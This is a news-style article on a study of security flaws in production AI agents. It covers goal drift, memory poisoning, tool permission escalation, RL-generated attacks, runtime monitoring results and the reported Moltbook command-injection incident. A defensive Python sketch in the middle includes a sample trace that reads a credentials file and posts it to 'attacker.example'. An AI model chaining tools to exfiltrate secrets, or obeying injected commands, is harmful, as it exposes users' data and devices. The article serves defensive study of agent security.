91% have vulnerabilities, 94% are susceptible to poisoning: AI agent security is a complete mess

Autonomous AI Agents are rapidly moving into healthcare, finance, and enterprise operations, but the largest security study of deployed agents to date shows that the vast majority of Agents running in production have serious vulnerabilities, and that current mainstream security assessment methods are almost powerless against them.

Recently, a joint research team from Stanford University, MIT CSAIL, Carnegie Mellon University, the IT University of Copenhagen, and NVIDIA found that among 847 autonomous agents deployed and evaluated in production, 91% have toolchain attack vulnerabilities, 89.4% experience target drift after about 30 steps of execution, and 94% of memory-enhanced agents face “poisoning” risks. The study uncovered 2,347 previously unknown vulnerabilities, 23% of which were rated as severe.

First author Owen Sakawa cited the early 2026 “OpenClaw/Moltbook incident” to demonstrate that this threat has moved from theory into reality: a single vulnerability in the Moltbook platform database led to the compromise of 770k active AI Agents, each with privileged access to their users’ devices, emails, and files. “This is no longer a hypothetical threat,” Sakawa said.

This serves as a direct warning to enterprises and investors accelerating their deployment of AI Agents: current mainstream security assessment frameworks were designed for stateless language models and cannot detect emergent, combinatorial vulnerabilities that only appear across multi-step executions, meaning many companies may be systematically misjudging the true security posture of their AI Agents. Gary Marcus, an expert in cognitive psychology and AI, commented, “Autonomous agents are a complete mess.”

Vulnerability Map: Six Attack Types, 2,347 Newly Discovered Weaknesses

The research covers four major industries: healthcare (289 deployments, 34.1%), finance (247, 29.2%), customer service (198, 23.4%), and code generation (113, 13.3%).

The study established a six-category vulnerability classification system for autonomous agents, including target drift and instruction decay, desynchronization between planner and executor, tool permission escalation, memory poisoning, silent multi-step policy violations, and delegation failures.

In production environment assessments, state manipulation led with 612 instances (26.1%), followed by target drift with 573 instances (24.4%). Tool misuse and chained calls, though only third in total count (489 instances), is the most severe category: 198 instances were rated severe, the highest share of any category.

The aggregate figures are even more alarming: 67% of agents experience target drift after 15 steps, 84% cannot maintain security policies across sessions, 73% lack memory-poisoning detection mechanisms, and 58% have timing-consistency vulnerabilities. The study also found that the effects of memory poisoning typically take an average of 3.7 sessions to manifest after initial injection, greatly increasing the difficulty of detection.

Real-world Case: 770k Agents Compromised Simultaneously

The OpenClaw (formerly Clawdbot and Moltbot) case provides the most direct real-world validation of the above threat model.

This open-source AI Agent, developed by Austrian developer Peter Steinberger and released in November 2025, accumulated over 160k GitHub stars within weeks. It can autonomously send emails, manage schedules, execute terminal commands, and deploy code, with persistent memory across sessions.

Security firm Astrix Security discovered, using its proprietary scanner ClawdHunter, 42,665 OpenClaw instances on the public internet, 8 of which were fully exposed with no authentication at all.

According to VentureBeat, Cisco’s AI security research team described OpenClaw as “a breakthrough in capability but an absolute nightmare from a security perspective.” Kaspersky identified 512 vulnerabilities during a security audit in January 2026, 8 of which were severe.

The Moltbook incident is particularly illustrative.

This social platform, built specifically for OpenClaw Agents, spread virally and attracted over 770k Agent registrations: users pointed Moltbook at their Agents, and the Agents completed registration autonomously.

Subsequently, a database vulnerability allowed attackers to bypass authentication and inject commands directly into any Agent session, putting all 770k Agents—each with privileged access to user devices—at risk simultaneously. The research team characterized this as the first recorded large-scale cross-Agent attack propagation event.

Security researcher Simon Willison described the “lethal trifecta” in OpenClaw: access to private data, exposure to untrusted content, and communication channels—all combined to make autonomous agents an ideal springboard for attackers.

Architectural Flaws: Why AI Agents Are More Vulnerable Than LLMs

The core conclusion is that the security challenges of autonomous agents are fundamentally different from those of stateless language models.

Security assessments for language models focus on “whether the model can be made to produce unsafe content”; for AI Agents, the question becomes “whether the model can be made to do unsafe things”—including real-world tool calls, state modifications affecting future behavior, and executing plans that violate policies over multiple steps.

The study illustrates this logic with a concrete scenario: an agent holds permissions to read files (read_file) and to make HTTP requests (http_request). Each tool’s access-control decision is compliant in isolation, but their combination enables data theft: reading credentials from a configuration file and exfiltrating them via an HTTP request. Every step satisfies the local security policy while the overall goal is adversarial, a failure mode the study files under “compositional safety.”
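The read-then-exfiltrate chain above can be sketched in a few lines. The tool names (read_file, http_request) come from the article; the policy functions and the sensitive-path list are hypothetical illustrations, not the study’s implementation:

```python
# Hypothetical sketch of the compositional-safety gap: each call passes
# an action-level check, but the sequence constitutes exfiltration.

SENSITIVE_PATHS = ("/etc/", ".env", "credentials")  # illustrative list

def action_level_allowed(tool: str, arg: str) -> bool:
    """Per-call check: each tool is permitted in isolation."""
    if tool == "read_file":
        return True   # the agent is allowed to read files
    if tool == "http_request":
        return True   # the agent is allowed to make HTTP requests
    return False

def sequence_level_allowed(trace: list) -> bool:
    """Multi-step check: flag 'read sensitive data, then talk to the
    network' even though every single step passed on its own."""
    read_sensitive = False
    for tool, arg in trace:
        if tool == "read_file" and any(p in arg for p in SENSITIVE_PATHS):
            read_sensitive = True
        if tool == "http_request" and read_sensitive:
            return False  # potential exfiltration chain
    return True

trace = [("read_file", "~/.aws/credentials"),
         ("http_request", "https://attacker.example/upload")]

# Each step is "compliant" in isolation, yet the chain is not:
assert all(action_level_allowed(t, a) for t, a in trace)
assert not sequence_level_allowed(trace)
```

The point of the sketch is that no amount of hardening the per-call checks closes the gap; the policy has to see the whole trace.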

In controlled architecture studies, researchers tested four mainstream architectures: ReAct agents, multi-agent systems, memory-enhanced agents, and tool-using agents.

Results showed that permission escalation attacks on tool-using agents had a success rate of up to 95%, and poisoning attacks on memory-enhanced agents reached 94%.

Even against the most resilient architecture, multi-agent systems, target drift attacks still succeeded 58% of the time, leading the researchers to conclude that none of the tested architectures currently has sufficient defenses for adversarial deployment.

Further, adaptive attack generation tests showed that attacks generated via reinforcement learning achieved a 79% violation success rate, a 25.4% relative increase over the 63% achieved by manually designed scenarios, indicating that the threat space for AI Agents exceeds what human red teams can cover.

Impact on Enterprise Deployment: Defense Frameworks Are Still Maturing

The research team proposed a minimum security baseline based on empirical results: all production Agents must deploy runtime monitoring; tools involved in data access and external communication should require manual approval; every 20–25 steps should trigger manual review to address target drift risks; memory-enhanced Agents should perform encrypted integrity checks on persistent states.
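A minimal sketch of what such a baseline gate might look like, assuming a hypothetical `RuntimeMonitor` wrapper (the class name, callbacks, tool list, and review interval are illustrative assumptions, not an API published by the study):

```python
# Illustrative runtime gate: approval for data-access/communication tools,
# plus a manual-review checkpoint every 25 steps (the upper end of the
# 20-25 step window cited above).

APPROVAL_REQUIRED = {"read_file", "http_request", "send_email"}
REVIEW_INTERVAL = 25

class RuntimeMonitor:
    def __init__(self, approve_fn, review_fn):
        self.approve_fn = approve_fn  # human-approval callback
        self.review_fn = review_fn    # periodic drift-review callback
        self.step = 0

    def gate(self, tool: str, arg: str) -> bool:
        """Run before every tool call; returns whether to proceed."""
        self.step += 1
        if self.step % REVIEW_INTERVAL == 0:
            self.review_fn(self.step)  # trigger manual review for drift
        if tool in APPROVAL_REQUIRED:
            return self.approve_fn(tool, arg)  # data access / external comms
        return True  # low-risk tools pass through

# Usage: deny all outbound HTTP, log review checkpoints.
monitor = RuntimeMonitor(
    approve_fn=lambda tool, arg: tool != "http_request",
    review_fn=lambda step: print(f"review checkpoint at step {step}"),
)
assert monitor.gate("calculator", "2+2")              # low-risk: allowed
assert monitor.gate("read_file", "notes.txt")         # approved by callback
assert not monitor.gate("http_request", "http://x")   # denied by callback
```

The design choice worth noting is that the gate sits outside the agent loop, so a drifted or poisoned agent cannot route around it.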

In terms of monitoring effectiveness, the study showed that action-level monitoring (single-step detection) achieved an accuracy of 0.94, sequence-level (multi-step behavior chains) F1 score was 0.85, and state-level monitoring F1 score was 0.83. During a 30-day runtime test of 127 production Agents, the system intercepted 4,782 operations with a false positive rate of 3.7%, and 14.6% of flagged operations were confirmed as genuine attacks.
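As a rough sanity check on those figures, and assuming both percentages are taken over the 4,782 flagged operations (this summary does not state the exact denominators), the implied counts are:

```python
# Back-of-the-envelope check on the 30-day monitoring figures above.
flagged = 4782
false_positive_rate = 0.037    # reported false positive rate
confirmed_attack_rate = 0.146  # share of flags confirmed as attacks

false_positives = round(flagged * false_positive_rate)
confirmed_attacks = round(flagged * confirmed_attack_rate)
print(false_positives, confirmed_attacks)  # 177 698
```

So on the order of 177 flags were noise and roughly 698 were genuine attacks, with the remainder presumably unresolved or benign-but-blocked.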

The study also pointed out a fundamental misalignment in current “AI governance” approaches: most frameworks are post-hoc audits rather than real-time compliance enforcement during execution.

As regulations like the EU Artificial Intelligence Act and the US NIST AI Risk Management Framework are implemented, compliance pressures and security risks will rise in tandem. With AI Agents being deployed in high-risk business scenarios, the lack of security infrastructure is becoming a systemic risk in this AI commercialization wave.
